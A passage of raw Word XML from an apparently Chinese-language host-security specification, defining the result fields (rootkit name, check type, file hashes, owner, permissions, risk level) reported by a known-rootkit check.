        <w:t xml:space="preserve">    "file_permission":"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rwxr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-x",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "modify_time":1548210801,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "change_time":1548210801,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>file_owner":"root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "file_size":31472,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>file_group":"root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7202F2D1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="467" w:name="_Toc115166306"/>
      <w:bookmarkStart w:id="468" w:name="检查功能已知rootkit检查"/>
      <w:bookmarkEnd w:id="466"/>
      <w:r>
        <w:t>检查功能：已知rootkit检查</w:t>
      </w:r>
      <w:bookmarkEnd w:id="467"/>
    </w:p>
    <w:p w14:paraId="762A2E57"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1661"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="6099"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="0678EC5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B40A788" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A67E3DA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E9CD4B2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71989AD6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="44F20084" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="680FB552" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rootkit_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DAC0453" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B2EAF75" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="190DE40A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>rootkit名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7C861A28" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="130A9A3A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>check_type</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18CB677C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E4DAD4E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14FE5817" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>检查类型,用来区分是文件、文件夹、内核符号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="26ED810F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FA66C63" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>extra_info</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E98F58B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D10BEB1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06708D68" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>仅当检查内核符号时可能有值,表示内核符号</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1915A1D2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="007CF1B9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>access_time</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5451EE71" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="663553A5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26D6CA25" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件的最近访问时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="565A0F55" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DEDA77D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>modify_time</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="513F5B13" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0695BAB4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="392833DA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件内容的修改时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="58413538" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="580B0140" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>file_md5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="393BD821" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47DF48B3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BF4C548" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>如果是文件，那么是整个文件内容计算MD5；如果是文件夹，是空字符串</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="122A11CD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58A38BEB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>file_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="153BA9C3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CEC6D31" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>100)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0525B1FE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="18FB6935" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72F9A59C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>file_size</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E533E17" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A81F244" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3637E28F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件大小</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5ABDB4C0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FFFE73F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>change_time</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="175769A7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F7CF89F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="485AB424" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件属性的修改时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="585C904C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3ACC0444" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>file_owner</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FCC685D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FCC9273" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="061B1761" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件所属用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1CE1C178" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="721885F4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>file_group</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31D7D362" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FD52640" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F29424F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件所属用户组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="582CFF80" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BC7DA4F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>file_permission</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D0EC7A3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B0DA83C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75FBCE79" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件访问权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="57E32308" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5152C1F7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>file_sha1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EE81338" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58363A29" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3362299C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件SHA1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7E949DE2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FC3D02F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>file_sha256</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56167297" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3636EAB1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73D647FD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>文件SHA256</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="16D70F6E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2679D360" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AAECF7C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F5A9813" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2188C415" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1:中危 ,2:高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="77CF0519" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5377B278" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>rule</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="320698AF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="421C4B6A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5285F32E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>命中的crontab内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3088131A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C0384AB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>file</w:t>
